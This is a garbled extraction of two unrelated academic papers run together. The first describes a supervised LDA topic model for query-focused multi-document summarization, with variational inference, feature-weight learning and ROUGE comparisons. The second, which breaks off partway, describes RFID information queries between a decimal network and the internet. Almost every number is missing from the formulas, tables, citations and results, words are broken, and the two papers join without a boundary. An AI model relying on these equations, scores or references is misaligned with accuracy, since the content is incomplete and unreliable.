q(θ, z | γ, φ) = ∏_m q(θ_m | γ) ∏_{s,n} q(z_msn | φ_ms)   ( )

here γ is a k-dimensional dirichlet parameter vector and the φ_ms are multinomial parameters. the first, third and fourth terms of eqn. ( ) are identical to the corresponding terms for unsupervised lda (blei et al., ). the second term is the expectation of the log probability of the features given the latent topic assignments:

e[log p(y_ms | z_ms, η)] = e(z_ms)^T η y_ms − log Σ_{z_ms} exp(z_ms^T η y_ms)   ( )

where e(z_ms)^T is a 1 × k dimensional vector [φ_msk], k = 1, ..., k. the bayes estimate for the s-slda model can be obtained via a variational em algorithm. in the em procedure, the lower bound is first maximized with respect to γ and φ, and then with respect to α and β while keeping γ and φ fixed.

e-step: the update of the dirichlet parameter γ is identical to that of unsupervised lda and does not involve the feature vector y_ms:

γ_m^{new} ← α + Σ_{s∈m} φ_s   ( )

φ_sk^{new} ∝ exp{ e[log θ_m | γ]_k + Σ_{n=1}^{n_ms} e[log p(w_msn | β_{1:k})] + Σ_{t=1}^{t} η_kt y_st },  with  e[log θ_m | γ]_k = Ψ(γ_mk) − Ψ(Σ_{k'=1}^{k} γ_mk')   ( )

where Ψ(·) denotes the digamma function (the first derivative of log Γ), m_s denotes the document that the current sentence comes from, and y_st denotes the t-th feature of sentence s.

m-step: the m-step for updating β is the same as in unsupervised lda, where the probability of a word being generated from a topic is proportional to the number of times this word is assigned to the topic:

β_kw^{new} = Σ_{m=1}^{m} Σ_{s=1}^{n_m} Σ_{n=1}^{n_ms} 1(w_msn = w) φ_ms^k   ( )

our approach. learning. in this subsection, we describe how we learn the feature weights η in a supervised way. the learning process of η is a supervised algorithm combined with the variational inference of s-slda. given a topic description q and a collection of training sentences s from related documents, human assessors assign a score v (v = − , − , , , ) to each sentence in s. the score is an integer between − (the least desired summary sentences) and + (the most desired summary sentences), and score denotes a neutral attitude. o_v = {o_v1, o_v2, ...} is the set containing the sentences with score v. let φ_qk denote the probability that the query is generated from topic k. since the query does not belong to any document, we use the following strategy to estimate φ_qk:

φ_qk = ∏_{w∈q} β_kw · (1/m) Σ_{m=1}^{m} exp[ Ψ(γ_mk) − Ψ(Σ_{k'=1}^{k} γ_mk') ]   ( )

in equ. ( ), ∏_{w∈q} β_kw denotes the probability that all terms in the query are generated from topic k, and (1/m) Σ_{m=1}^{m} exp[ Ψ(γ_mk) − Ψ(Σ_{k'} γ_mk') ] can be seen as the average probability that the documents in the corpus are talking about topic k. eqn. ( ) is based on the assumption that the query topic is relevant to the main topic discussed by the document corpus. this is a reasonable assumption, and most previous lda summarization models are based on similar assumptions. next, we define φ_{o_v,k} for the sentence set o_v, which can be interpreted as the probability that all sentences in the collection o_v are generated from topic k:

φ_{o_v,k} = (1/|o_v|) Σ_{s∈o_v} φ_sk ,   k ∈ [1, k], for each score value v   ( )

|o_v| denotes the number of sentences in set o_v. inspired by the idea that desired summary sentences should be more semantically related to the query, we transform the problem of finding the optimum η into the following optimization problem:

min_η l(η) = Σ_v v · kl(o_v || q) ,   subject to Σ_{t=1}^{t} η_kt = 1   ( )

(we select multiple queries and their related sentences for training.) here kl(o_v || q) is the kullback-leibler divergence between the query topic distribution and the sentence set o_v, as shown in eqn. ( ):

kl(o_v || q) = Σ_{k=1}^{k} φ_{o_v,k} log( φ_{o_v,k} / φ_qk )   ( )

from eqn. ( ), we can see that the set containing the most desirable sentences is given the largest penalty for its kl divergence from the query; the case is just the opposite for the undesired sets. our idea is to incorporate the minimization of eqn. ( ) into the variational inference process of the s-slda model. here we apply a gradient-based optimization method to minimize eqn. ( ). first, we derive the gradient of l(η) with respect to η:

∂l(η)/∂η_xy = Σ_v v · ∂kl(o_v || q)/∂η_xy   ( )

∂kl(o_v || q)/∂η_xy = Σ_{k=1}^{k} (1/|o_v|) (1 + log φ_{o_v,k}) Σ_{s∈o_v} ∂φ_sk/∂η_xy − Σ_{k=1}^{k} (log φ_qk / |o_v|) Σ_{s∈o_v} ∂φ_sk/∂η_xy − Σ_{k=1}^{k} (φ_{o_v,k} / φ_qk) ∂φ_qk/∂η_xy   ( )

for simplification, we regard β and γ as constants during the update of η, so ∂φ_qk/∂η_xy = 0 and the last term above vanishes. we can further obtain the first derivative for each labeled sentence:

∂φ_sk/∂η_xy ∝ y_sy · exp[ Ψ(γ_{m_s,k}) − Ψ(Σ_{k'=1}^{k} γ_{m_s,k'}) + Σ_{t=1}^{t} η_kt y_st ] · ∏_{w∈s} β_kw  if k = x,  and 0 if k ≠ x   ( )

feature space. lots of features have been proven to be useful for summarization (louis et al., ).
here we dis- cuss several types of features which are adopted in s-slda model. the feature values are either binary or normalized to the interval [ , ]. the following features are used in s-slda: cosine similarity with query: cosine similarity is based on the tf-idf value of terms. this is reasonable because the influence of γ and β have been embodied in φ during each iteration. local inner-document degree order: local inner document degree order is a binary feature which indicates whether inner-document degree (idd) of sentence s is the largest among its neighbors. idd means the edge number between s and other sen- tences in the same document. document specific word: if a sentence contains document specific word, otherwise. average unigram probability (nenkova and van- derwende, ; celikyilmaz and hakkani-tur ): as for sentence s, p(s) = ∑ w∈s |s|pd(w), where pd(w) is the observed unigram probability in document collection. in addition, we also use the commonly used fea- tures including sentence position, paragraph po- sition, sentence length and sentence bigram fre- quency. e-step initialize φ sk := /k for all i and s. initialize γmi := αmi + n)m/k for all i. initialize ηkt = for all k and t. while not convergence for m = : m update γt+ m according to eqn.( ) for s = : nm for k = : k update φt+ sk according to eqn.( ) normalize the sum of φt+ sk to . minimize l(η) according to eqn.( )-( ). m-step: update β according to eqn.( ) figure : learning process of η in s-slda . sentence selection strategy next we explain our sentence selection strategy. ac- cording to our intuition that the desired summary should have a small kl divergence with query, we propose a function to score a set of sentences sum. we use a decreasing logistic function ζ(x) = /( + ex) to refine the score to the range of ( , ). score(sum) = ζ(kl(sum||q)) ( ) let sum? denote the optimum update summary. we can get sum? by maximizing the scoring function. sum? = arg max sum∈s&&words(sum)≤l score(sum) ( ) . learning: given labeled set ov, learn the feature weight vector η using algorithm in figure . . given new data set and η, use algorithm in section . for inference. (the only difference between this step and step ( ) is that in this step we do not need minimize l(η). . select sentences for summarization from algo- rithm in figure . figure : summarization generation by s-slda. a greedy algorithm is applied by adding sentence one by one to obtain sum?. we use g to denote the sentence set containing selected sentences. the algorithm first initializes g to Φ and x to su. dur- ing each iteration, we select one sentence from x which maximize score(sm ∪g). to avoid topic re- dundancy in the summary, we also revise the mmr strategy (goldstein et al., ; ouyang et al., ) in the process of sentence selection. for each sm, we compute the semantic similarity between sm and each sentence st in set y in eqn.( ). cos−sem(sm,st) = ∑ k φsmkφstk√∑ k φ smk √∑ k φ stk ( ) we need to assure that the value of semantic similar- ity between two sentences is less than thsem. the whole procedure for summarization using s-slda model is illustrated in figure . thsem is set to . in the experiments. experiments . experiments set-up the query-focused multi-document summarization task defined in duc (document understanding conference) and tac (text analysis conference) evaluations requires generating a concise and well organized summary for a collection of related news documents according to a given query which de- scribes the users information need. 
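the sentence selection strategy described in the previous subsection (greedy maximization of score(sum) = ζ(kl(sum || q)) under a length budget, with an mmr-style similarity check on topic-space cosine similarity) can be sketched as follows. the sentence-topic vectors, sentence lengths, word budget and similarity threshold are invented toy values, and approximating the summary topic distribution by the mean of the per-sentence φ vectors is a simplifying assumption of this sketch, not a detail taken from the paper.

# greedy, redundancy-aware sentence selection with a kl-based score (toy data)
import numpy as np

phi = np.array([                  # per-sentence topic distributions (phi_s)
    [0.7, 0.2, 0.1],
    [0.6, 0.3, 0.1],
    [0.1, 0.2, 0.7],
    [0.3, 0.4, 0.3],
])
lengths = np.array([12, 15, 10, 9])
q = np.array([0.6, 0.3, 0.1])     # query topic distribution (phi_q)
LIMIT, TH_SEM = 30, 0.9           # word budget and similarity threshold (assumed values)

def kl(p, r):
    return float(np.sum(p * np.log(p / r)))

def score(indices):
    summ = phi[indices].mean(axis=0)          # topic distribution of the candidate summary
    return 1.0 / (1.0 + np.exp(kl(summ, q)))  # decreasing logistic of the kl divergence

def too_similar(i, chosen):
    for j in chosen:                          # mmr-style redundancy check in topic space
        cos = phi[i] @ phi[j] / (np.linalg.norm(phi[i]) * np.linalg.norm(phi[j]))
        if cos > TH_SEM:
            return True
    return False

chosen, used = [], 0
while True:
    candidates = [i for i in range(len(phi))
                  if i not in chosen and used + lengths[i] <= LIMIT and not too_similar(i, chosen)]
    if not candidates:
        break
    best = max(candidates, key=lambda i: score(chosen + [i]))   # add the sentence that helps most
    chosen.append(best)
    used += lengths[best]
print(chosen)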
the query usually consists of a title and one or more narra- tive/question sentences. the system-generated sum- maries for duc and tac are respectively limited to http://duc.nist.gov/. http://www.nist.gov/tac/. words and words. our experiment data is composed of duc , tac and tac data which have , and collections respec- tively. in our experiments, duc data is used as training data and tac ( - ) data is used as the test data. stop-words in both documents and queries are removed using a stop-word list of words, and the remaining words are stemmed by porter stem- mer . as for the automatic evaluation of summa- rization, rouge (recall-oriented understudy for gisting evaluation) measures, including rouge- , rouge- , and rouge-su and their corre- sponding % confidence intervals, are used to eval- uate the performance of the summaries. in order to obtain a more comprehensive measure of summary quality, we also conduct manual evaluation on tac data with reference to (haghighi and vanderwende, ; celikyilmaz and hakkani-tur, ; delort and alfonseca, ). . comparison with other bayesian models in this subsection, we compare our model with the following bayesian baselines: kl-sum: it is developed by haghighi and vanderwende (lin et al., ) by using a kl- divergence based sentence selection strategy. kl(ps||qd) = ∑ w p(w)log p(w) q(w) ( ) where ps is the unigram distribution of candidate summary and qd denotes the unigram distribution of document collection. sentences with higher ranking score is selected into the summary. hiersum: a lda based approach proposed by haghighi and vanderwende ( ), where unigram distribution is calculated from lda topic model in equ.( ). hybhsum: a supervised approach developed by celikyilmaz and hakkani-tur ( ). for fair comparison, baselines use the same pro- precessing methods with our model and all sum- here, we only use the docset-a data in tac, since tac data is composed of docset-a and docset-b data, and the docset- b data is mainly for the update summarization task. http://tartarus.org/ martin/porterstemmer/. jackknife scoring for rouge is used in order to compare with the human summaries. maries are truncated to the same length of words. from table and table , we can methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) hybhsum . . . ( . - . ) ( . - . ) ( . - . ) hiersum . . . ( . - . ) ( . - . ) ( . - . ) klsum . . . ( . - . ) ( . - . ) ( . - . ) standlda . . . ( . - . ) ( . - . ) ( . - . ) table : comparison of bayesian models on tac methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) hybhsum . . . ( . - . ) ( . - . ) ( . - . ) hiersum . . . ( . - . ) ( . - . ) ( . - . ) klsum . . . ( . - . ) ( . - . ) ( . - . ) standlda . . . ( . - . ) ( . - . ) ( . - . ) table : comparison of bayesian models on tac see that among all the bayesian baselines, hybh- sum achieves the best result. this further illus- trates the advantages of combining topic model with supervised method. in table , we can see that our s-slda model performs better than hybhsum and the improvements are . % and . % with re- spect to rouge- and rouge-su on tac data. the comparison can be extended to tac data as shown in table : the performance of s- slda is above hybhsum by . % in rouge- and . % in rouge-su . it is worth explaining that these achievements are significant, because in the tac evaluation, the performance of the top ranking systems are very close, i.e. the best system is only . % above the th best system on rouge- and . % on rouge-su . . 
comparison with other baselines. in this subsection, we compare our model with some widely used models in summarization. manifold: it is the one-layer graph based semi- supervised summarization approach developed by wan et al.( ). the graph is constructed only con- sidering sentence relations using tf-idf and neglects topic information. lexrank: graph based summarization approach (erkan and radev, ), which is a revised version of famous web ranking algorithm pagerank. it is an unsupervised ranking algorithms compared with manifold. svm: a supervised method - support vector ma- chine (svm) (vapnik ) which uses the same features as our approach. mead: a centroid based summary algorithm by radev et al. ( ). cluster centroids in mead consists of words which are central not only to one article in a cluster, but to all the articles. similarity is measure using tf-idf. at the same time, we also present the top three participating systems with regard to rouge- on tac and tac for comparison, denoted as (denoted as sysrank st, nd and rd)(gillick et al., ; zhang et al., ; gillick et al., ; varma et al., ). the rouge scores of the top tac system are directly provided by the tac evaluation. from table and table , we can see that our approach outperforms the baselines in terms of rouge metrics consistently. when compared with the standard supervised method svm, the relative improvements over the rouge- , rouge- and rouge-su scores are . %, . %, . % respec- tively on tac and . %, . %, . % on tac . our model is not as good as top par- ticipating systems on tac and tac . but considering the fact that our model neither uses sen- tence compression algorithm nor leverage domain knowledge bases like wikipedia or training data, such small difference in rouge scores is reason- able. . manual evaluations in order to obtain a more accurate measure of sum- mary quality for our s-slda model and hybhsum, we performed a simple user study concerning the following aspects: ( ) overall quality: which sum- mary is better overall? ( ) focus: which summary contains less irrelevant content? ( )responsiveness: which summary is more responsive to the query. ( ) non-redundancy: which summary is less re- dundant? judges who specialize in nlp partic- ipated in the blind evaluation task. evaluators are presented with two summaries generated by s-slda methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) sysrank st . . . ( . - . ) ( . - . ) ( . - . ) sysrank nd . . . ( . - . ( . - . ) ( . - . ) sysrank rd . . . ( . - . ) ( . - . ) ( . - . ) pagerank . . . ( . - . ) ( . - . ) ( . - . ) manifold . . . ( . - . ) ( . - . ) ( . - . ) svm . . . ( . - . ) ( . - . ) ( . - . ) mead . . . ( . - . ) ( . - . ) ( . - . ) table : comparison with baselines on tac methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) sysrank st . . . ( . - . ) ( . - . ) ( . - . ) sysrank nd . . . ( . - . ) ( . - . ) ( . - . ) sysrank rd . . . ( . - . ) ( . - . ) ( . - . ) pagerank . . . ( . - . ) ( . - . ) ( . - . ) manifold . . . ( . - . ) ( . - . ) ( . - . ) svm . . . ( . - . ) ( . - . ) ( . - . ) mead . . . ( . - . ) ( . - . ) ( . - . ) table : comparison with baselines on tac and hybhsum, as well as the four questions above. then they need to answer which summary is better (tie). we randomly select document collections from tac data and randomly assign two sum- maries for each collection to three different evalua- tors to judge which model is better in each aspect. 
as we can see from table , the two models al- most tie with respect to non-redundancy, mainly because both models have used appropriate mmr strategies. but as for overall quality, focus and our(win) hybhsum(win) tie overall focus responsiveness non-redundancy table : comparison with baselines on tac responsiveness, s-slda model outputs hybhsum based on t-test on % confidence level. ta- ble shows the example summaries generated re- spectively by two models for document collection d a-a in tac , whose query is “describe the coal mine accidents in china and actions taken“. from table , we can see that each sentence in these two summaries is somewhat related to topics of coal mines in china. we also observe that the summary in table (a) is better than that in table (b), tend- ing to select shorter sentences and provide more in- formation. this is because, in s-slda model, topic modeling is determined simultaneously by various features including terms and other ones such as sen- tence length, sentence position and so on, which can contribute to summary quality. as we can see, in table (b), sentences ( ) and ( ) provide some unimportant information such as “somebody said“, though they contain some words which are related to topics about coal mines. ( )china to close at least , coal mines this year: official ( )by oct. this year there had been coal mine accidents that killed or more people, ( )offi- cials had stakes in coal mines. ( )all the coal mines will be closed down this year. ( ) in the first eight months, the death toll of coal mine accidents rose . percent last year. ( ) the government has issued a series of regulations and measures to improve the coun.try’s coal mine safety situation. ( )the mining safety technology and equipments have been sold to countries. ( )more than , miners died in accidents in china ( ) in the first eight months, the death toll of coal mine accidents across china rose . percent from the same period last year. ( )china will close down a number of ill-operated coal mines at the end of this month, said a work safety official here monday. ( ) li yizhong, director of the national bureau of production safety supervision and administration, has said the collusion between mine owners and officials is to be condemned. ( )from january to september this year, , people were killed in , coal mine accidents. ( ) chen said officials who refused to register their stakes in coal mines within the required time table : example summary text generated by systems (a)s-slda and (b) hybhsum. (d a-a, tac ) conclusion in this paper, we propose a novel supervised ap- proach based on revised supervised topic model for query-focused multi document summarization. our approach naturally combines bayesian topic model with supervised method and enjoy the advantages of both models. experiments on benchmark demon- strate good performance of our model. acknowledgments this research work has been supported by nsfc grants (no. and no. ), national key technology r&d program (no: bah b ), and national high tech- nology r&d program (no. aa ). we also thank the three anonymous reviewers for their helpful comments. corresponding author: sujian li. references david blei and jon mcauliffe. supervised topic models. . in neural information processing systems david blei, andrew ng and micheal jordan. latent dirichlet allocation. in the journal of machine learn- ing research, page: - . charles broyden. . a class of methods for solv- ing nonlinear simultaneous equations. in math. comp. volume , page - . 
jaime carbonell and jade goldstein. . the use of mmr, diversity-based reranking for reordering doc- uments and producing summaries. in proceedings of the st annual international acm sigir conference on research and development in information retrieval. asli celikyilmaz and dilek hakkani-tur. . a hy- brid hierarchical model for multi-document summa- rization. in proceedings of the th annual meeting of the association for computational linguistics. page: - jade goldstein, mark kantrowitz, vibhu mittal and jaime carbonell. . summarizing text docu- ments: sentence selection and evaluation metrics. in proceedings of the nd annual international acm si- gir conference on research and development in infor- mation retrieval, page: - . amit grubber, micheal rosen-zvi and yair weiss. . hidden topic markov model. in artificial intelligence and statistics. hal daume and daniel marcu h. . bayesian query- focused summarization. in proceedings of the st international conference on computational linguis- tics and the th annual meeting of the association for computational linguistics, page - . gune erkan and dragomir radev. . lexrank: graph- based lexical centrality as salience in text summariza- tion. in j. artif. intell. res. (jair), page - . dan gillick, benoit favre, dilek hakkani-tur, the icsi summarization system at tac, tac . dan gillick, benoit favre, and dilek hakkani-tur, berndt bohnet, yang liu, shasha xie. the icsi/utd summarization system at tac . tac aria haghighi and lucy vanderwende. . exploring content models for multi-document summarization. in proceedings of human language technologies: the annual conference of the north american chap- ter of the association for computational linguistics, pages . feng jin, minlie huang, and xiaoyan zhu. . the summarization systems at tac . in proceedings of the third text analysis conference, tac- . liangda li, ke zhou, gui-rong xue, hongyuan zha and yong yu. . enhancing diversity, coverage and bal- ance for summarization through structure learning. in proceedings of the th international conference on world wide web, page - . chin-yew lin, guihong gao, jianfeng gao and jian-yun nie. . an information-theoretic approach to au- tomatic evaluation of summaries. in proceedings of the main conference on human language technology conference of the north american chapter of the as- sociation of computational linguistics, page: - . annie louis, aravind joshi, ani nenkova. . dis- course indicators for content selection in summariza- tion. in proceedings of the th annual meeting of the special interest group on discourse and dialogue, page: - . tengfei ma, xiaojun wan. . multi-document sum- marization using minimum distortion, in proceedings of international conference of data mining. page . rebecca mason and eugene charniak. . extractive multi-document summaries should explicitly not con- tain document-specific content. in proceedings of acl hlt, page: - . ani nenkova and lucy vanderwende. the impact of fre- quency on summarization. in tech. report msr-tr- - , microsoft research, redwood, washing- ton, . ani nenkova, lucy vanderwende and kathleen mcke- own. . a compositional context sensitive multi- document summarizer: exploring the factors that inu- ence summarization. in proceedings of the th an- nual international acm sigir conference on re- search and development in information retrieval, page - . miles osborne. . using maximum entropy for sen- tence extraction. in proceedings of the acl- work- shop on automatic summarization, volume page: - . 
jahna otterbacher, gunes erkan and dragomir radev. . using random walks for question-focused sen- tence retrieval. in proceedings of the conference on human language technology and empirical methods in natural language processing, page - you ouyang, wenjie li, sujian li and qin lua. . applying regression models to query-focused multi- document summarization. in information processing and management, page - . you ouyang, sujian. li, and wenjie. li. , develop- ing learning strategies for topic-based summarization. in proceedings of the sixteenth acm conference on conference on information and knowledge manage- ment, page: . daniel ramage, david hall, ramesh nallapati and christopher manning. . labeled lda: a super- vised topic model for credit attribution in multi-labeled corpora. in proceedings of the conference on empirical methods in natural language processing, vol , page - . dou she, jian-tao sun, hua li, qiang yang and zheng chen. . document summarization using conditional random elds. in proceedings of inter- national joint conference on artificial intelligence, page: . v. varma, v. bharat, s. kovelamudi, p. bysani, s. gsk, k. kumar n, k. reddy, n. maganti , iiit hyderabad at tac . tac xiaojun wan and jianwu yang. . multi-document summarization using cluster-based link analysis. in proceedings of the st annual international acm si- gir conference on research and development in in- formation retrieval, page: - . xiaojun wan, jianwu yang and jianguo xiao. . manifold-ranking based topic-focused multi- document summarization. in proceedings of in- ternational joint conference on artificial intelligence, page - . furu wei, wenjie li, qin lu and yanxiang he. . ex- ploiting query-sensitive similarity for graph-based query-oriented summarization. in proceedings of the st annual international acm sigir conference on research and development in information retrieval, page - . jin zhang, xueqi cheng, hongbo xu, xiaolei wang, yil- ing zeng. ictcas’s ictgrasper at tac : sum- marizing dynamic information with signature terms based content filtering, tac . dengzhong zhou, jason weston, arthur gretton, olivier bousquet and bernhard schlkopf. . ranking on data manifolds. in proceedings of the conference on advances in neural information processing systems, page - . jun zhu and eric xing. . conditional topic random fields. in proceedings of the th international con- ference on machine learning. xiaojin zhu, zoubin ghahramani and john laf- ferty. . semi-supervised learning using gaussian fields and harmonic functions. in proceedings of in- ternational conference of machine learning, page: - . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - on the rfid information query technology based on ipv li guiping the school of computer science and engineering xi’an technological university, xi’an, china e-mail: @qq.com xue lei shandong university of science and technology daizong street, tai’an city shandong province, e-mail: shirleyxue @ .com abstract—since coding format of rf label is inconsistent with the protocol format of the information server's network, a design scheme of network architecture is proposed to achieve the connectivity between the decimal network based on ipv and the internet network based on ipv /ipv . and also, two ways of information’s query and connectivity based on d-ons and direct routing between the decimal network is devised by using the expert modules. 
the experiment results shows that both the two ways can provide efficient service of rfid information query . keywords-ipv ; rfid; domain transformation; information query i. introduction with the development of radio frequency technology, product-related information can be quickly obtained by the readers if rf tags are assigned to each product. recently, people have began to adopt ipv and even ipv protocol formats for rf tag coding since ipv address space has been used up. if the server storing product-related information is stored in an ipv or ipv network, how to query rf information across the network should be solved. this paper mainly studies the rf information query process of interconnection between decimal network and internet network and the domain name conversion rules obtained by decimal network query server. ii. ipv ipv , short for decimal network and the new generation of internet, is the result of china's independent innovation of core technologies which has ipv protocol, ipv addressing, digital domain name system and other core technologies are adopted with original and independent intellectual property rights. full digital text is used to represent the ip address. the address space is larger than that of ipv or ipv . the st- th level of the address space is expressed as binary bits, while using the decimal bits to express the th. iii. rfid radio frequency identification(rfid) is a non- contact automatic recognition technology. it communicates with other object using reflected power. it can automatically identify target objects and obtain relevant data through radio frequency signals, which can quickly track items and exchange data. and also, the identify ability need no one to participate in. a typical rfid system consists of electronic tag, reader (including antenna) and application system. further, electronic tags are the data carrier of rfid system which consists of a label antenna and a label chip. it can receive the reader's electromagnetic field modulation signal and return the response signal to achieve the label identification code and memory data read or write operations. the reader is used to receive host commands and send the data stored in the sensor back to the host by the wired or wireless way. it contains a controller and an antenna. if the reading distance is long, the antenna will stand alone. the terminal computer of the application system interacting with the rfid system transmits the work instructions issued by the mis application system. it makes electronic tags and readers be coordination through middleware, processes all data collected by rfid system, and carries out calculation, storage and data transmission. the process can be described as fig. and fig. . figure . the requery process of information based on rfid timin g data energy rfid antenna rfid electronic label computer control network rfid reader and writer international journal of advanced network, monitoring and controls volume , no. , figure . electronic tags the operating principle of rfid system is to receive the radio frequency signal emitted by the reader when an item with an electronic tag enters the radiation range of the reader antenna. the passive tag sends data stored in the tag chip using the energy generated by the induced current, while active electronic tags can send data stored in the tag chip, actively. generally, readers are equipped with middleware of certain functions. 
hence, it can read data, decode and directly carry out simple data processing, then send to the application system. the application system judges the legitimacy of electronic tags according to the logic operation, and carries out corresponding processing and control for different settings, thus realizing the basic functions of rfid system. iv. network architecture based on ipv rfid information query technology rfid information query technology can provide people with the function of inquiring information related to products through the rfid tag. the information related to rfid tags is stored on the information server and is generally maintained by the manufacturer of the product. in view of the actual use of the internet, it is necessary to design a network architecture for interconnection between the decimal network and the internet, which meets certain conditions. on this basis, rfid tag information query service is implemented. the overall network architecture design scheme is as follows. a. overall design of network architecture the architecture of rfid tag information query service on internet is based on ipv and ipv protocols. routing adopts ipv and ipv protocols, and resource positioning is completed by sns and psns. the architecture of electronic tag information location query service based on decimal network is a network architecture based on ipv protocol, including the following two ways. ( ) using the routing to locate the information server directly. the route uses the ipv protocol without the dns resolver. ( ) adopting the parsing service of the application layer with u-code resolution server. dons uses host domain name resolution to provide ipv , ipv and ipv addresses, while using ipv , ipv and ipv protocols as routing protocols .resource positioning is done by d-ons. the network architecture of rfid tag information query service mainly includes the decimal network information query service technology system and the internet information query service technology system. specifically, the decimal network architecture includes middleware, information server, d-ons server, ddns and ipv direct router. internet architecture includes sns server, psns server, information server, .cn root dns server, ddns server and.cn root. dns server through the domain name resolution forwarding digital domain name and english domain name connectivity. b. the key module of network architecture -- expert module the expert module is the middleware used between the decimal network and the internet to realize the interconnection between the two, and the data exchange format between the two is xml. it includes the following interfaces.  rf information query of decimal network and architecture of discovery technology input product and service digital identifiers to query the internet rf information, through the expert module, discovery technology architecture request to return the product and service specific information storage address or uri.  rf information query of internet and architecture of discovery technology input product and service digital identifiers to query the decimal network rf information, through the expert module, discovery technology architecture request to return the product and service specific information storage address or uri. 
 rf information query of decimal network and architecture of discovery technology input product and service digital identifiers to query the internet rf information, through the expert module, discovery technology architecture request to return the product and service specific information. international journal of advanced network, monitoring and controls volume , no. ,  rf information query of internet and architecture of discovery technology input product and service digital identifiers to query the decimal network rf information, through the expert module, discovery technology architecture request to return the product and service specific information. v. research on information query process based on the above network architecture, the implementation of rfid tag information query service based on ipv can be designed in two ways: d-ons based decimal network and internet network information query and direct routing mode of exchange visits between decimal network information query service system and internet information query service system. a. exchange query process between d-ons-based decimal network and internet network information query service system when the related product information is stored in the internet information server and label coding format is using able format, the decimal network based on d- ons accessing the information query process of internet mainly involves the following several key modules: decimal network query server, decimal network, expert module, information server middleware, the sns and psns server. the access relationship between these modules is shown in figure . decimal network label readers require server expert modul middleware sns server psns server information server a) b) c) d) i) e) j) f) g) h) identifiers of product and service domain of product and server standard identifiers and identifiers of product and service domain of product and server naptr resource record address of information server conneccti on internet identifiers of product and service figure . the process of accessing the internet on a d-ons- based decimal network. ) the access process can be described as follows a) using rfid readers to read ipv identifiers and product and service identifiers from electronic tags. b) submitting the read identifiers and product and service identifiers to the query server in the decimal network. c) calling decimal network query server and internet interface expert modules to access the internet. d) the internet interface of the expert module accesses the middleware of the internet architecture through standard identifiers and identifiers of product and service . e) the service middleware converts the standard identifier to the domain name format and sends it to the sns server to request the resolution service. f) the sns server returns the conversion rules of psid domain name by the form of regular expressions to the service middleware. g) service middleware issues query request to psns server based on psid domain name. international journal of advanced network, monitoring and controls volume , no. , h) psns returns the naptr record containing the product and service information service or psds address. i) the service middleware returns the results to the expert module, whose decimal network interface returns service of the product and information or naptr records of psds address to the query server. j) querying the server request and finally getting the product information returned by the information server. 
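steps a) through j) above can be summarized as a plain walk-through in code. every server name, domain mapping, conversion rule and address in the sketch is a hypothetical placeholder introduced only to show the order of the calls; the real sns/psns interfaces and naptr record formats are not reproduced here.

# schematic walk-through of the d-ons based query flow (all names are placeholders)

def read_tag():
    # a) the rfid reader returns the identifier of product and service
    return "86.500.1.123456"                        # invented example identifier

def sns_lookup(domain):
    # e)-f) the sns server returns a conversion rule for the psid domain name
    return lambda d: d + ".psid.example"            # placeholder for a regular-expression rule

def psns_lookup(psid_domain):
    # g)-h) the psns server returns a naptr-like record with the information server address
    return {"naptr": {"service": "product-info", "address": "info-server.example"}}

def information_server(address, identifier):
    # j) the information server returns the product record
    return {"id": identifier, "name": "sample product", "origin": "factory-01"}

def query(identifier):
    # b)-d) query server -> expert module -> internet middleware
    domain = identifier.replace(".", "-") + ".onsepc.example"   # placeholder domain mapping
    rule = sns_lookup(domain)
    record = psns_lookup(rule(domain))                          # i) results flow back via the expert module
    return information_server(record["naptr"]["address"], identifier)

print(query(read_tag()))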
when product-related information is stored in the information server of the decimal network, and the label encoding format is ipv or ipv format, the d- ons based decimal network needs to be accessed through the internet network. the access process involves the key modules: internet query server, expert module, d-ons server, information server. the access process is shown in figure . decimal network d-ons resolve server d-ons server information server domain resolve server expert modul label reader requery server a) b) c) f) d) e) g) tandard id code and domain name onversion network distributed query control product and service domain name address of information server identifiers of product and service. identifiers of product and service. internet figure . the process of internet accessing to a decimal network based on the d-ons protocol. ) the access process can be described as follows a) using rf readers to read product and service identifiers from electronic tags encoded in ipv and ipv formats. b) submitting the identifier and identifiers of product and service to the query server. c) calling by the query server the expert module's decimal network interface between the internet network and the decimal network. d) the decimal network interface of the expert module sends a request to the d-ons server of the decimal network architecture to inquire the information of the server domain name where the product information is stored through the identifier and product and service. e) the d-ons server receives the request and returns information of the product and service domain name. f) the information server of decimal network queries the internet server for product information. g) the query server returns product information. b. directly routing the decimal network information query service and the internet information query service system exchange query process the process of mutual visits between the system of decimal network information query service with direct routing and the internet information query service system are shown in figure and figure . it involve the query server, expert module, middleware, information server, sns server and psns server. international journal of advanced network, monitoring and controls volume , no. , the interconnection of ipv , ipv and ipv can realize the mutual visits between ipv , ipv and ipv through protocol conversion. specifically, a protocol conversion server needs to be set up, and all data packets are converted into specified protocols to satisfy the data communication between different protocols. decimal network label reader requery server internet middleware sns server psns server information server a) b) c) j) d) i) e) k) f) g) h) identifier of product and service identifier of product and service domain of product and server naptr resource record address of information server connection expert modul protocl transerformation ipv ipv / ipv figure . the accessing process of direct routing of decimal network to the internet ) the process of searching the product information stored in the internet and encoding format used ipv can be described as follows. rf reader reads ipv identifier and the identifier of product and service from electronic tag. submitting identifiers of product and service to the query server on a decimal network. a) the query server calls the expert module's internet interface. b) the internet interface of the expert module accesses the middleware of the internet architecture through identifiers of product and service. 
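the protocol-conversion server mentioned earlier in this section, which rewrites packets so that traffic can cross between networks running different protocols, can be sketched schematically. the field names, the address mapping table and the address formats below are invented placeholders and do not follow the real header layouts of the protocols discussed above.

# purely schematic protocol conversion between two address families (placeholder data)

ADDRESS_MAP = {                   # hypothetical mapping table kept by the conversion server
    "2001:db8::10": "86.21.4.7.1001",
    "198.51.100.20": "86.21.4.7.1002",
}

def convert(packet, target_family):
    converted = dict(packet)                          # leave the payload untouched
    converted["family"] = target_family               # rewrite the protocol family
    converted["src"] = ADDRESS_MAP.get(packet["src"], packet["src"])
    converted["dst"] = ADDRESS_MAP.get(packet["dst"], packet["dst"])
    return converted

incoming = {"family": "ipv6", "src": "2001:db8::10", "dst": "198.51.100.20", "payload": b"query"}
print(convert(incoming, "decimal-network"))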
